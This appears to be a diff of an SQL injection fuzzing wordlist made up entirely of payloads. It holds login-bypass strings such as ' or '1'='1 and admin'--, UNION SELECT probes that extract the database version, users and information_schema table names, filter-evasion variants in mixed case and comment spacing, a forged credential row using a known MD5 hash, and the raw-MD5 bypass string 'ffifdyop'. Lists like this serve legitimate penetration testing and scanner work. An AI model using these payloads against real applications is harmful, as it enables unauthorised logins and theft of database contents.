' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
